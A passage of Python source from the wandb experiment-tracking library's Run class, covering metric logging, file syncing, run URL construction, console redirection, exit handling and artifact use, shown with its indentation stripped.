row, step, publish_step=not_using_tensorboard
)
def _console_callback(self, name, data):
# logger.info("console callback: %s, %s", name, data)
if self._backend:
self._backend.interface.publish_output(name, data)
def _tensorboard_callback(
self, logdir, save = None, root_logdir = None
):
logger.info("tensorboard callback: %s, %s", logdir, save)
save = True if save is None else save
if self._backend:
self._backend.interface.publish_tbdata(logdir, save, root_logdir)
def _set_library(self, library):
self._wl = library
def _set_backend(self, backend):
self._backend = backend
def _set_reporter(self, reporter):
self._reporter = reporter
def _set_teardown_hooks(self, hooks):
self._teardown_hooks = hooks
def _set_run_obj(self, run_obj):
self._run_obj = run_obj
self._entity = run_obj.entity
self._project = run_obj.project
# Grab the config from resuming
if run_obj.config:
c_dict = config_util.dict_no_value_from_proto_list(run_obj.config.update)
# TODO: Windows throws a wild error when this is set...
if "_wandb" in c_dict:
del c_dict["_wandb"]
# We update the config object here without triggering the callback
self.config._update(c_dict, allow_val_change=True, ignore_locked=True)
# Update the summary, this will trigger an un-needed graphql request :(
if run_obj.summary:
summary_dict = {}
for orig in run_obj.summary.update:
summary_dict[orig.key] = json.loads(orig.value_json)
self.summary.update(summary_dict)
self.history._update_step()
# TODO: It feels weird to call this twice..
sentry_set_scope(
"user",
entity=run_obj.entity,
project=run_obj.project,
email=self._settings.email,
url=self._get_run_url(),
)
def _set_run_obj_offline(self, run_obj):
self._run_obj_offline = run_obj
def _add_singleton(
self, data_type, key, value
):
"""Stores a singleton item to wandb config.
A singleton in this context is a piece of data that is continually
logged with the same value in each history step, but represented
as a single item in the config.
We do this to avoid filling history with a lot of repeated, unnecessary data.
`_add_singleton` can be called many times in one run; the stored value is only
updated when it changes, and the last value logged is the one
persisted to the server."""
value_extra = {"type": data_type, "key": key, "value": value}
if data_type not in self.config["_wandb"]:
self.config["_wandb"][data_type] = {}
if data_type in self.config["_wandb"][data_type]:
old_value = self.config["_wandb"][data_type][key]
else:
old_value = None
if value_extra != old_value:
self.config["_wandb"][data_type][key] = value_extra
self.config.persist()
def log(
self,
data,
step = None,
commit = None,
sync = None,
):
"""Log a dict to the global run's history.
Use `wandb.log` to log data from runs, such as scalars, images, video,
histograms, and matplotlib plots.
The most basic usage is `wandb.log({'train-loss': 0.5, 'accuracy': 0.9})`.
This will save a history row associated with the run with `train-loss=0.5`
and `accuracy=0.9`. Visualize logged data in the workspace at wandb.ai,
or locally on a self-hosted instance of the W&B app:
https://docs.wandb.ai/self-hosted
Export data to explore in a Jupyter notebook, for example, with the API:
https://docs.wandb.ai/ref/public-api
Each time you call wandb.log(), this adds a new row to history and updates
the summary values for each key logged. In the UI, summary values show
up in the run table to compare single values across runs. You might want
to update summary manually to set the *best* value instead of the *last*
value for a given metric. After you finish logging, you can set summary:
`wandb.run.summary["accuracy"] = 0.9`.
Logged values don't have to be scalars. Logging any wandb object is supported.
For example `wandb.log({"example": wandb.Image("myimage.jpg")})` will log an
example image which will be displayed nicely in the wandb UI. See
https://docs.wandb.com/library/reference/data_types for all of the different
supported types.
Logging nested metrics is encouraged and is supported in the wandb API, so
you could log multiple accuracy values with `wandb.log({'dataset-1':
{'acc': 0.9, 'loss': 0.3} ,'dataset-2': {'acc': 0.8, 'loss': 0.2}})`
and the metrics will be organized in the wandb UI.
W&B keeps track of a global step so logging related metrics together is
encouraged, so by default each time wandb.log is called a global step
is incremented. If it's inconvenient to log related metrics together
calling `wandb.log({'train-loss': 0.5}, commit=False)` and then
`wandb.log({'accuracy': 0.9})` is equivalent to calling
`wandb.log({'train-loss': 0.5, 'accuracy': 0.9})`
wandb.log is not intended to be called more than a few times per second.
If you want to log more frequently than that it's better to aggregate
the data on the client side or you may get degraded performance.
Arguments:
row: (dict, optional) A dict of serializable python objects i.e `str`,
`ints`, `floats`, `Tensors`, `dicts`, or `wandb.data_types`.
commit: (boolean, optional) Save the metrics dict to the wandb server
and increment the step. If false `wandb.log` just updates the current
metrics dict with the row argument and metrics won't be saved until
`wandb.log` is called with `commit=True`.
step: (integer, optional) The global step in processing. This persists
any non-committed earlier steps but defaults to not committing the
specified step.
sync: (boolean, True) This argument is deprecated and currently doesn't
change the behaviour of `wandb.log`.
Examples:
Basic usage
```python
wandb.log({'accuracy': 0.9, 'epoch': 5})
```
Incremental logging
```python
wandb.log({'loss': 0.2}, commit=False)
# Somewhere else when I'm ready to report this step:
wandb.log({'accuracy': 0.8})
```
Histogram
```python
wandb.log({"gradients": wandb.Histogram(numpy_array_or_sequence)})
```
Image
```python
wandb.log({"examples": [wandb.Image(numpy_array_or_pil, caption="Label")]})
```
Video
```python
wandb.log({"video": wandb.Video(numpy_array_or_video_path, fps=4,
format="gif")})
```
Matplotlib Plot
```python
wandb.log({"chart": plt})
```
PR Curve
```python
wandb.log({'pr': wandb.plots.precision_recall(y_test, y_probas, labels)})
```
3D Object
```python
wandb.log({"generated_samples":
[wandb.Object3D(open("sample.obj")),
wandb.Object3D(open("sample.gltf")),
wandb.Object3D(open("sample.glb"))]})
```
For more examples, see https://docs.wandb.com/library/log
Raises:
wandb.Error: if called before `wandb.init`
ValueError: if invalid data is passed
"""
current_pid = os.getpid()
if current_pid != self._pid:
message = "log() ignored (called from pid={}, init called from pid={}). See: https://docs.wandb.ai/library/init#multiprocess".format(
current_pid, self._pid
)
if self._settings._strict:
wandb.termerror(message, repeat=False)
raise errors.LogMultiprocessError(
"log() does not support multiprocessing"
)
wandb.termwarn(message, repeat=False)
return
if not isinstance(data, Mapping):
raise ValueError("wandb.log must be passed a dictionary")
if any(not isinstance(key, string_types) for key in data.keys()):
raise ValueError("Key values passed to `wandb.log` must be strings.")
if step is not None:
# if step is passed in when tensorboard_sync is used we honor the step passed
# to make decisions about how to close out the history record, but will strip
# this history later on in publish_history()
using_tensorboard = len(wandb.patched["tensorboard"]) > 0
if using_tensorboard:
wandb.termwarn(
"Step cannot be set when using syncing with tensorboard. Please log your step values as a metric such as 'global_step'",
repeat=False,
)
if self.history._step > step:
wandb.termwarn(
(
"Step must only increase in log calls. "
"Step {} < {}; dropping {}.".format(
step, self.history._step, data
)
)
)
return
elif step > self.history._step:
self.history._flush()
self.history._step = step
elif commit is None:
commit = True
if commit:
self.history._row_add(data)
else:
self.history._row_update(data)
def save(
self,
glob_str = None,
base_path = None,
policy = "live",
):
""" Ensure all files matching *glob_str* are synced to wandb with the policy specified.
Arguments:
glob_str: (string) a relative or absolute path to a unix glob or regular
path. If this isn't specified the method is a noop.
base_path: (string) the base path to run the glob relative to
policy: (string) one of `live`, `now`, or `end`
- live: upload the file as it changes, overwriting the previous version
- now: upload the file once now
- end: only upload file when the run ends
"""
if glob_str is None:
# noop for historical reasons, run.save() may be called in legacy code
wandb.termwarn(
(
"Calling run.save without any arguments is deprecated."
"Changes to attributes are automatically persisted."
)
)
return True
if policy not in ("live", "end", "now"):
raise ValueError(
'Only "live" "end" and "now" policies are currently supported.'
)
if isinstance(glob_str, bytes):
glob_str = glob_str.decode("utf-8")
if not isinstance(glob_str, string_types):
raise ValueError("Must call wandb.save(glob_str) with glob_str a str")
if base_path is None:
if os.path.isabs(glob_str):
base_path = os.path.dirname(glob_str)
wandb.termwarn(
(
"Saving files without folders. If you want to preserve "
"sub directories pass base_path to wandb.save, i.e. "
'wandb.save("/mnt/folder/file.h5", base_path="/mnt")'
)
)
else:
base_path = "."
wandb_glob_str = os.path.relpath(glob_str, base_path)
if ".." + os.sep in wandb_glob_str:
raise ValueError("globs can't walk above base_path")
with telemetry.context(run=self) as tel:
tel.feature.save = True
if glob_str.startswith("gs://") or glob_str.startswith("s3://"):
wandb.termlog(
"%s is a cloud storage url, can't save file to wandb." % glob_str
)
return []
files = glob.glob(os.path.join(self.dir, wandb_glob_str))
warn = False
if len(files) == 0 and "*" in wandb_glob_str:
warn = True
for path in glob.glob(glob_str):
file_name = os.path.relpath(path, base_path)
abs_path = os.path.abspath(path)
wandb_path = os.path.join(self.dir, file_name)
wandb.util.mkdir_exists_ok(os.path.dirname(wandb_path))
# We overwrite symlinks because namespaces can change in Tensorboard
if os.path.islink(wandb_path) and abs_path != os.readlink(wandb_path):
os.remove(wandb_path)
os.symlink(abs_path, wandb_path)
elif not os.path.exists(wandb_path):
os.symlink(abs_path, wandb_path)
files.append(wandb_path)
if warn:
file_str = "%i file" % len(files)
if len(files) > 1:
file_str += "s"
wandb.termwarn(
(
"Symlinked %s into the W&B run directory, "
"call wandb.save again to sync new files."
)
% file_str
)
files_dict = dict(files=[(wandb_glob_str, policy)])
if self._backend:
self._backend.interface.publish_files(files_dict)
return files
def restore(
self,
name,
run_path = None,
replace = False,
root = None,
):
return restore(name, run_path or self.path, replace, root or self.dir)
def finish(self, exit_code = None):
"""Marks a run as finished, and finishes uploading all data. This is
used when creating multiple runs in the same process. We automatically
call this method when your script exits.
"""
with telemetry.context(run=self) as tel:
tel.feature.finish = True
# detach logger, other setup cleanup
logger.info("finishing run %s", self.path)
for hook in self._teardown_hooks:
hook()
self._teardown_hooks = []
self._atexit_cleanup(exit_code=exit_code)
if self._wl and len(self._wl._global_run_stack) > 0:
self._wl._global_run_stack.pop()
module.unset_globals()
def join(self, exit_code = None):
"""Deprecated alias for `finish()` - please use finish"""
self.finish(exit_code=exit_code)
# TODO(jhr): annotate this
def plot_table(self, vega_spec_name, data_table, fields, string_fields=None): # type: ignore
"""Creates a custom plot on a table.
Arguments:
vega_spec_name: the name of the spec for the plot
table_key: the key used to log the data table
data_table: a wandb.Table object containing the data to
be used on the visualization
fields: a dict mapping from table keys to fields that the custom
visualization needs
string_fields: a dict that provides values for any string constants
the custom visualization needs
"""
visualization = create_custom_chart(
vega_spec_name, data_table, fields, string_fields or {}
)
return visualization
def _set_upgraded_version_message(self, msg):
self._upgraded_version_message = msg
def _set_deleted_version_message(self, msg):
self._deleted_version_message = msg
def _set_yanked_version_message(self, msg):
self._yanked_version_message = msg
def _add_panel(
self, visualize_key, panel_type, panel_config
):
config = {
"panel_type": panel_type,
"panel_config": panel_config,
}
self._config_callback(val=config, key=("_wandb", "visualize", visualize_key))
def _get_url_query_string(self):
s = self._settings
# TODO(jhr): migrate to new settings, but for now this is safer
api = internal.Api()
if api.settings().get("anonymous") != "true":
return ""
api_key = apikey.api_key(settings=s)
return "?" + urlencode({"apiKey": api_key})
def _get_project_url(self):
s = self._settings
r = self._run_obj
if not r:
return ""
app_url = wandb.util.app_url(s.base_url)
qs = self._get_url_query_string()
url = "{}/{}/{}{}".format(
app_url, url_quote(r.entity), url_quote(r.project), qs
)
return url
def _get_run_url(self):
s = self._settings
r = self._run_obj
if not r:
return ""
app_url = wandb.util.app_url(s.base_url)
qs = self._get_url_query_string()
url = "{}/{}/{}/runs/{}{}".format(
app_url, url_quote(r.entity), url_quote(r.project), url_quote(r.run_id), qs
)
return url
def _get_sweep_url(self):
"""Generate a url for a sweep.
Returns:
(str): url if the run is part of a sweep
(None): if the run is not part of the sweep
"""
r = self._run_obj
if not r:
return ""
sweep_id = r.sweep_id
if not sweep_id:
return ""
app_url = wandb.util.app_url(self._settings.base_url)
qs = self._get_url_query_string()
return "{base}/{entity}/{project}/sweeps/{sweepid}{qs}".format(
base=app_url,
entity=url_quote(r.entity),
project=url_quote(r.project),
sweepid=url_quote(sweep_id),
qs=qs,
)
def _get_run_name(self):
r = self._run_obj
if not r:
return ""
return r.display_name
def _display_run(self):
project_url = self._get_project_url()
run_url = self._get_run_url()
sweep_url = self._get_sweep_url()
version_str = "Tracking run with wandb version {}".format(wandb.__version__)
if self.resumed:
run_state_str = "Resuming run"
else:
run_state_str = "Syncing run"
run_name = self._get_run_name()
app_url = wandb.util.app_url(self._settings.base_url)
sync_dir = self._settings._sync_dir
if self._settings._jupyter:
sync_dir = "<code>{}</code>".format(sync_dir)
dir_str = "Run data is saved locally in {}".format(sync_dir)
if self._settings._jupyter and ipython._get_python_type() == "jupyter":
sweep_line = (
'Sweep page: <a href="{}" target="_blank">{}</a><br/>\n'.format(
sweep_url, sweep_url
)
if sweep_url
else ""
)
docs_html = '<a href="https://docs.wandb.com/integrations/jupyter.html" target="_blank">(Documentation)</a>' # noqa: E501
ipython.display_html(
"""
{}<br/>
{} <strong style="color:{}">{}</strong> to <a href="{}" target="_blank">Weights & Biases</a> {}.<br/>
Project page: <a href="{}" target="_blank">{}</a><br/>
{}Run page: <a href="{}" target="_blank">{}</a><br/>
{}<br/><br/>
""".format( # noqa: E501
version_str,
run_state_str,
RUN_NAME_COLOR,
run_name,
app_url,
docs_html,
project_url,
project_url,
sweep_line,
run_url,
run_url,
dir_str,
)
)
else:
wandb.termlog(version_str)
wandb.termlog(
"{} {}".format(run_state_str, click.style(run_name, fg="yellow"))
)
emojis = dict(star="", broom="", rocket="")
if platform.system() != "Windows":
emojis = dict(star="⭐️", broom="🧹", rocket="🚀")
wandb.termlog(
"{} View project at {}".format(
emojis.get("star", ""),
click.style(project_url, underline=True, fg="blue"),
)
)
if sweep_url:
wandb.termlog(
"{} View sweep at {}".format(
emojis.get("broom", ""),
click.style(sweep_url, underline=True, fg="blue"),
)
)
wandb.termlog(
"{} View run at {}".format(
emojis.get("rocket", ""),
click.style(run_url, underline=True, fg="blue"),
)
)
wandb.termlog(dir_str)
if not self._settings._offline:
wandb.termlog("Run `wandb offline` to turn off syncing.")
print("")
def _redirect(
self,
stdout_slave_fd,
stderr_slave_fd,
console = None,
):
if console is None:
console = self._settings._console
logger.info("redirect: %s", console)
# out_redir: redirect.RedirectBase
# err_redir: redirect.RedirectBase
if console == self._settings.Console.REDIRECT:
logger.info("Redirecting console.")
# out_cap = redirect.Capture(
# name="stdout", cb=self._redirect_cb, output_writer=self._output_writer
# )
# err_cap = redirect.Capture(
# name="stderr", cb=self._redirect_cb, output_writer=self._output_writer
# )
out_redir = redirect.Redirect(
src="stdout",
cbs=[
lambda data: self._redirect_cb("stdout", data), # type: ignore
self._output_writer.write, # type: ignore
],
)
err_redir = redirect.Redirect(
src="stderr",
cbs=[
lambda data: self._redirect_cb("stderr", data), # type: ignore
self._output_writer.write, # type: ignore
],
)
if os.name == "nt":
def wrap_fallback():
if self._out_redir:
self._out_redir.uninstall()
if self._err_redir:
self._err_redir.uninstall()
msg = (
"Tensorflow detected. Stream redirection is not supported "
"on Windows when tensorflow is imported. Falling back to "
"wrapping stdout/err."
)
wandb.termlog(msg)
self._redirect(None, None, console=self._settings.Console.WRAP)
add_import_hook("tensorflow", wrap_fallback)
elif console == self._settings.Console.WRAP:
logger.info("Wrapping output streams.")
out_redir = redirect.StreamWrapper(
src="stdout",
cbs=[
lambda data: self._redirect_cb("stdout", data), # type: ignore
self._output_writer.write, # type: ignore
],
)
err_redir = redirect.StreamWrapper(
src="stderr",
cbs=[
lambda data: self._redirect_cb("stderr", data), # type: ignore
self._output_writer.write, # type: ignore
],
)
elif console == self._settings.Console.OFF:
return
else:
raise ValueError("unhandled console")
try:
out_redir.install()
err_redir.install()
self._out_redir = out_redir
self._err_redir = err_redir
logger.info("Redirects installed.")
except Exception as e:
print(e)
logger.error("Failed to redirect.", exc_info=e)
return
# TODO(jhr): everything below here is not executed as we only support redir mode
#
# from wandb.lib import console as lib_console
# from wandb.old import io_wrap
#
# redirect stdout
# if platform.system() == "Windows":
# lib_console.win32_redirect(stdout_slave_fd, stderr_slave_fd)
# else:
# self._save_stdout = sys.stdout
# self._save_stderr = sys.stderr
# stdout_slave = os.fdopen(stdout_slave_fd, "wb")
# stderr_slave = os.fdopen(stderr_slave_fd, "wb")
# stdout_redirector = io_wrap.FileRedirector(sys.stdout, stdout_slave)
# stderr_redirector = io_wrap.FileRedirector(sys.stderr, stderr_slave)
# stdout_redirector.redirect()
# stderr_redirector.redirect()
# self.stdout_redirector = stdout_redirector
# self.stderr_redirector = stderr_redirector
# logger.info("redirect done")
def _restore(self):
logger.info("restore")
# TODO(jhr): drain and shutdown all threads
if self._use_redirect:
if self._out_redir:
self._out_redir.uninstall()
if self._err_redir:
self._err_redir.uninstall()
return
if self.stdout_redirector:
self.stdout_redirector.restore()
if self.stderr_redirector:
self.stderr_redirector.restore()
if self._save_stdout:
sys.stdout = self._save_stdout
if self._save_stderr:
sys.stderr = self._save_stderr
logger.info("restore done")
def _atexit_cleanup(self, exit_code = None):
if self._backend is None:
logger.warning("process exited without backend configured")
return
if self._atexit_cleanup_called:
return
self._atexit_cleanup_called = True
exit_code = exit_code or self._hooks.exit_code if self._hooks else 0
logger.info("got exitcode: %d", exit_code)
if exit_code == 0:
# Cleanup our resume file on a clean exit
if os.path.exists(self._settings.resume_fname):
os.remove(self._settings.resume_fname)
self._exit_code = exit_code
try:
self._on_finish()
except KeyboardInterrupt as ki:
if wandb.wandb_agent._is_running():
raise ki
wandb.termerror("Control-C detected -- Run data was not synced")
if ipython._get_python_type() == "python":
os._exit(-1)
except Exception as e:
self._console_stop()
self._backend.cleanup()
logger.error("Problem finishing run", exc_info=e)
wandb.termerror("Problem finishing run")
traceback.print_exception(*sys.exc_info())
if ipython._get_python_type() == "python":
os._exit(-1)
else:
# if silent, skip this as it is used to output stuff
if self._settings._silent:
return
self._on_final()
def _console_start(self):
logger.info("atexit reg")
self._hooks = ExitHooks()
self._hooks.hook()
atexit.register(lambda: self._atexit_cleanup())
if self._use_redirect:
# setup fake callback
self._redirect_cb = self._console_callback
output_log_path = os.path.join(self.dir, filenames.OUTPUT_FNAME)
self._output_writer = filesystem.CRDedupedFile(open(output_log_path, "wb"))
self._redirect(self._stdout_slave_fd, self._stderr_slave_fd)
def _console_stop(self):
self._restore()
if self._output_writer:
self._output_writer.close()
self._output_writer = None
def _on_init(self):
self._show_version_info()
def _on_start(self):
# TODO: make offline mode in jupyter use HTML
if self._settings._offline:
wandb.termlog(
(
"W&B syncing is set to `offline` in this directory. "
"Run `wandb online` or set WANDB_MODE=online to enable cloud syncing."
)
)
if self._settings.save_code and self._settings.code_dir is not None:
self.log_code(self._settings.code_dir)
if self._run_obj and not self._settings._silent:
self._display_run()
if self._backend and not self._settings._offline:
self._run_status_checker = RunStatusChecker(self._backend.interface)
self._console_start()
def _pusher_print_status(
self,
progress,
prefix = True,
done = False,
):
if self._settings._offline:
return
line = " %.2fMB of %.2fMB uploaded (%.2fMB deduped)\r" % (
progress.uploaded_bytes / 1048576.0,
progress.total_bytes / 1048576.0,
progress.deduped_bytes / 1048576.0,
)
if self._jupyter_progress:
# percent_done: float
if progress.total_bytes == 0:
percent_done = 1
else:
percent_done = progress.uploaded_bytes / progress.total_bytes
self._jupyter_progress.update(percent_done, line)
if done:
self._jupyter_progress.close()
elif not self._settings._jupyter:
spinner_states = ["-", "\\", "|", "/"]
line = spinner_states[self._progress_step % 4] + line
self._progress_step += 1
wandb.termlog(line, newline=False, prefix=prefix)
if done:
dedupe_fraction = (
progress.deduped_bytes / float(progress.total_bytes)
if progress.total_bytes > 0
else 0
)
if dedupe_fraction > 0.01:
wandb.termlog(
"W&B sync reduced upload amount by %.1f%% "
% (dedupe_fraction * 100),
prefix=prefix,
)
# clear progress line.
wandb.termlog(" " * 79, prefix=prefix)
def _on_finish_progress(self, progress, done = None):
self._pusher_print_status(progress, done=done)
def _wait_for_finish(self):
while True:
if self._backend:
poll_exit_resp = self._backend.interface.communicate_poll_exit()
logger.info("got exit ret: %s", poll_exit_resp)
if poll_exit_resp:
done = poll_exit_resp.done
pusher_stats = poll_exit_resp.pusher_stats
if pusher_stats:
self._on_finish_progress(pusher_stats, done)
if done:
return poll_exit_resp
time.sleep(0.1)
def _on_finish(self):
trigger.call("on_finished")
# populate final import telemetry
with telemetry.context(run=self) as tel:
self._telemetry_imports(tel.imports_finish)
if self._run_status_checker:
self._run_status_checker.stop()
# make sure all uncommitted history is flushed
self.history._flush()
self._console_stop() # TODO: there's a race here with jupyter console logging
if not self._settings._silent:
if self._backend:
pid = self._backend._internal_pid
status_str = "Waiting for W&B process to finish, PID {}".format(pid)
if not self._exit_code:
status_str += "\nProgram ended successfully."
else:
status_str += "\nProgram failed with code {}. ".format(self._exit_code)
if not self._settings._offline:
status_str += " Press ctrl-c to abort syncing."
if self._settings._jupyter and ipython._get_python_type() == "jupyter":
ipython.display_html("<br/>" + status_str.replace("\n", "<br/>"))
else:
print("")
wandb.termlog(status_str)
# telemetry could have changed, publish final data
if self._backend:
self._backend.interface.publish_telemetry(self._telemetry_obj)
# TODO: we need to handle catastrophic failure better
# some tests were timing out on sending exit for reasons not clear to me
if self._backend:
self._backend.interface.publish_exit(self._exit_code)
# Wait for data to be synced
self._poll_exit_response = self._wait_for_finish()
if self._backend:
ret = self._backend.interface.communicate_summary()
self._final_summary = proto_util.dict_from_proto_list(ret.item)
if self._backend:
ret = self._backend.interface.communicate_sampled_history()
d = {item.key: item.values_float or item.values_int for item in ret.item}
self._sampled_history = d
if self._backend:
self._backend.cleanup()
if self._run_status_checker:
self._run_status_checker.join()
def _on_final(self):
# check for warnings and errors, show log file locations
if self._reporter:
# TODO: handle warnings and errors nicely in jupyter
warning_lines = self._reporter.warning_lines
if warning_lines:
wandb.termlog("Warnings:")
for line in warning_lines:
wandb.termlog(line)
if len(warning_lines) < self._reporter.warning_count:
wandb.termlog("More warnings")
error_lines = self._reporter.error_lines
if error_lines:
wandb.termlog("Errors:")
for line in error_lines:
wandb.termlog(line)
if len(error_lines) < self._reporter.error_count:
wandb.termlog("More errors")
if self._settings.log_user:
log_user = self._settings.log_user
if self._settings._jupyter:
log_user = "<code>{}</code>".format(log_user)
log_str = "Find user logs for this run at: {}".format(log_user)
if self._settings._jupyter and ipython._get_python_type() == "jupyter":
ipython.display_html(log_str)
else:
wandb.termlog(log_str)
if self._settings.log_internal:
log_internal = self._settings.log_internal
if self._settings._jupyter:
log_internal = "<code>{}</code>".format(log_internal)
log_str = "Find internal logs for this run at: {}".format(log_internal)
if self._settings._jupyter and ipython._get_python_type() == "jupyter":
ipython.display_html(log_str)
else:
wandb.termlog(log_str)
self._show_summary()
self._show_history()
self._show_files()
if self._run_obj:
run_url = self._get_run_url()
run_name = self._get_run_name()
if self._settings._jupyter and ipython._get_python_type() == "jupyter":
ipython.display_html(
"""
<br/>Synced <strong style="color:{}">{}</strong>: <a href="{}" target="_blank">{}</a><br/>
""".format(
RUN_NAME_COLOR, run_name, run_url, run_url
)
)
else:
wandb.termlog(
"\nSynced {}: {}".format(
click.style(run_name, fg="yellow"),
click.style(run_url, fg="blue"),
)
)
if self._settings._offline:
# TODO: handle jupyter offline messages
wandb.termlog("You can sync this run to the cloud by running:")
wandb.termlog(
click.style(
"wandb sync {}".format(self._settings._sync_dir), fg="yellow"
)
)
self._show_version_info(footer=True)
def _show_version_info(self, footer = None):
package_problem = False
if self._deleted_version_message:
wandb.termerror(self._deleted_version_message)
package_problem = True
elif self._yanked_version_message:
wandb.termwarn(self._yanked_version_message)
package_problem = True
# only display upgrade message if packages are bad or in header
if not footer or package_problem:
if self._upgraded_version_message:
wandb.termlog(self._upgraded_version_message)
def _show_summary(self):
if self._final_summary:
logger.info("rendering summary")
max_len = max([len(k) for k in self._final_summary.keys()])
format_str = " {:>%s} {}" % max_len
summary_rows = []
for k, v in iteritems(self._final_summary):
# arrays etc. might be too large. for now we just don't print them
if isinstance(v, string_types):
if len(v) >= 20:
v = v[:20] + "..."
summary_rows.append((k, v))
elif isinstance(v, numbers.Number):
if isinstance(v, float):
v = round(v, 5)
summary_rows.append((k, v))
if self._settings._jupyter and ipython._get_python_type() == "jupyter":
summary_table = ipython.STYLED_TABLE_HTML
for row in summary_rows:
summary_table += "<tr><td>{}</td><td>{}</td></tr>".format(*row)
summary_table += "</table>"
ipython.display_html("<h3>Run summary:</h3><br/>" + summary_table)
else:
summary_lines = "\n".join(
[format_str.format(k, v) for k, v in summary_rows]
)
wandb.termlog("Run summary:")
wandb.termlog(summary_lines)
def _show_history(self):
if not self._sampled_history:
return
# Only print sparklines if the terminal is utf-8
# In some python 2.7 tests sys.stdout is a 'cStringIO.StringO' object
# which doesn't have the attribute 'encoding'
encoding = getattr(sys.stdout, "encoding", None)
if not encoding or encoding.upper() not in ("UTF_8", "UTF-8",):
return
logger.info("rendering history")
max_len = max([len(k) for k in self._sampled_history])
history_rows = []
for key in self._sampled_history:
vals = wandb.util.downsample(self._sampled_history[key], 40)
if any((not isinstance(v, numbers.Number) for v in vals)):
continue
line = sparkline.sparkify(vals)
history_rows.append((key, line))
if self._settings._jupyter and ipython._get_python_type() == "jupyter":
history_table = ipython.STYLED_TABLE_HTML
for row in history_rows:
history_table += "<tr><td>{}</td><td>{}</td></tr>".format(*row)
history_table += "</table>"
ipython.display_html("<h3>Run history:</h3><br/>" + history_table + "<br/>")
else:
wandb.termlog("Run history:")
history_lines = ""
format_str = " {:>%s} {}\n" % max_len
for row in history_rows:
history_lines += format_str.format(*row)
wandb.termlog(history_lines)
def _show_files(self):
if not self._poll_exit_response or not self._poll_exit_response.file_counts:
return
if self._settings._offline:
return
logger.info("logging synced files")
if self._settings._silent:
return
file_str = "Synced {} W&B file(s), {} media file(s), {} artifact file(s) and {} other file(s)".format( # noqa:E501
self._poll_exit_response.file_counts.wandb_count,
self._poll_exit_response.file_counts.media_count,
self._poll_exit_response.file_counts.artifact_count,
self._poll_exit_response.file_counts.other_count,
)
if self._settings._jupyter and ipython._get_python_type() == "jupyter":
ipython.display_html(file_str)
else:
wandb.termlog(file_str)
def _save_job_spec(self):
envdict = dict(python="python3.6", requirements=[],)
varsdict = {"WANDB_DISABLE_CODE": "True"}
source = dict(
git="git@github.com:wandb/examples.git", branch="master", commit="bbd8d23",
)
execdict = dict(
program="train.py",
directory="keras-cnn-fashion",
envvars=varsdict,
args=[],
)
configdict = (dict(self._config),)
artifactsdict = dict(dataset="v1",)
inputdict = dict(config=configdict, artifacts=artifactsdict,)
job_spec = {
"kind": "WandbJob",
"version": "v0",
"environment": envdict,
"source": source,
"exec": execdict,
"input": inputdict,
}
s = json.dumps(job_spec, indent=4)
spec_filename = filenames.JOBSPEC_FNAME
with open(spec_filename, "w") as f:
print(s, file=f)
self.save(spec_filename)
def define_metric(
self,
name,
step_metric = None,
step_sync = None,
hidden = None,
summary = None,
goal = None,
overwrite = None,
**kwargs
):
"""Define metric properties which will later be logged with `wandb.log()`.
Arguments:
name: Name of the metric.
step_metric: Independent variable associated with the metric.
step_sync: Automatically add `step_metric` to history if needed.
Defaults to True if step_metric is specified.
hidden: Hide this metric from automatic plots.
summary: Specify aggregate metrics added to summary.
Supported aggregations: "min,max,mean,best,last,copy,none"
Default aggregation is `copy`.
Aggregation `best` defaults to `goal`==`minimize`.
goal: Specify direction for optimizing the metric.
Supported directions: "minimize,maximize"
Returns:
A metric object is returned that can be further specified.
"""
if not name:
raise wandb.Error("define_metric() requires non-empty name argument")
for k in kwargs:
wandb.termwarn("Unhandled define_metric() arg: {}".format(k))
if isinstance(step_metric, wandb_metric.Metric):
step_metric = step_metric.name
for arg_name, arg_val, exp_type in (
("name", name, string_types),
("step_metric", step_metric, string_types),
("step_sync", step_sync, bool),
("hidden", hidden, bool),
("summary", summary, string_types),
("goal", goal, string_types),
("overwrite", overwrite, bool),
):
# NOTE: type checking is broken for isinstance and string_types
if arg_val is not None and not isinstance(arg_val, exp_type): # type: ignore
arg_type = type(arg_val).__name__
raise wandb.Error(
"Unhandled define_metric() arg: {} type: {}".format(
arg_name, arg_type
)
)
stripped = name[:-1] if name.endswith("*") else name
if "*" in stripped:
raise wandb.Error(
"Unhandled define_metric() arg: name (glob suffixes only): {}".format(
name
)
)
summary_ops = None
if summary:
summary_items = [s.lower() for s in summary.split(",")]
summary_ops = []
valid = {"min", "max", "mean", "best", "last", "copy", "none"}
for i in summary_items:
if i not in valid:
raise wandb.Error(
"Unhandled define_metric() arg: summary op: {}".format(i)
)
summary_ops.append(i)
goal_cleaned = None
if goal is not None:
goal_cleaned = goal[:3].lower()
valid_goal = {"min", "max"}
if goal_cleaned not in valid_goal:
raise wandb.Error(
"Unhandled define_metric() arg: goal: {}".format(goal)
)
m = wandb_metric.Metric(
name=name,
step_metric=step_metric,
step_sync=step_sync,
summary=summary_ops,
hidden=hidden,
goal=goal_cleaned,
overwrite=overwrite,
)
m._set_callback(self._metric_callback)
m._commit()
with telemetry.context(run=self) as tel:
tel.feature.metric = True
return m
# TODO(jhr): annotate this
def watch(self, models, criterion=None, log="gradients", log_freq=100, idx=None): # type: ignore
wandb.watch(models, criterion, log, log_freq, idx)
# TODO(jhr): annotate this
def use_artifact(self, artifact_or_name, type=None, aliases=None): # type: ignore
""" Declare an artifact as an input to a run, call `download` or `file` on
the returned object to get the contents locally.
Arguments:
artifact_or_name: (str or Artifact) An artifact name.
May be prefixed with entity/project. Valid names
can be in the following forms:
- name:version
- name:alias
- digest
You can also pass an Artifact object created by calling `wandb.Artifact`
type: (str, optional) The type of artifact to use.
aliases: (list, optional) Aliases to apply to this artifact
Returns:
An `Artifact` object.
"""
r = self._run_obj
api = internal.Api(default_settings={"entity": r.entity, "project": r.project})
api.set_current_run_id(self.id)
if isinstance(artifact_or_name, str):
name = artifact_or_name
public_api = self._public_api()
artifact = public_api.artifact(type=type, name=name)
if type is not None and type != artifact.type:
raise ValueError(
"Supplied type {} does not match type {} of artifact {}".format(
type, artifact.type, artifact.name
)
)
api.use_artifact(artifact.id)
return artifact
else:
artifact = artifact_or_name
if aliases is None:
aliases = []
elif isinstance(aliases, str):
aliases = [aliases]
if isinstance(artifact_or_name, wandb.Artifact):
self._log_artifact(
artifact, aliases, is_user_created=True, use_after_commit=True
)
return artifact
elif isinstance(artifact, public.Artifact):
api.use_artifact(artifact.id)
return artifact
else:
raise ValueError(
'You must pass an artifact name (e.g. "pedestrian-dataset:v1"), an instance of wandb.Artifact, or wandb.Api().artifact() to use_artifact' # noqa: E501
)
def log_artifact(
self,
artifact_or_path,
name = None,
type = None,
aliases = None,
):
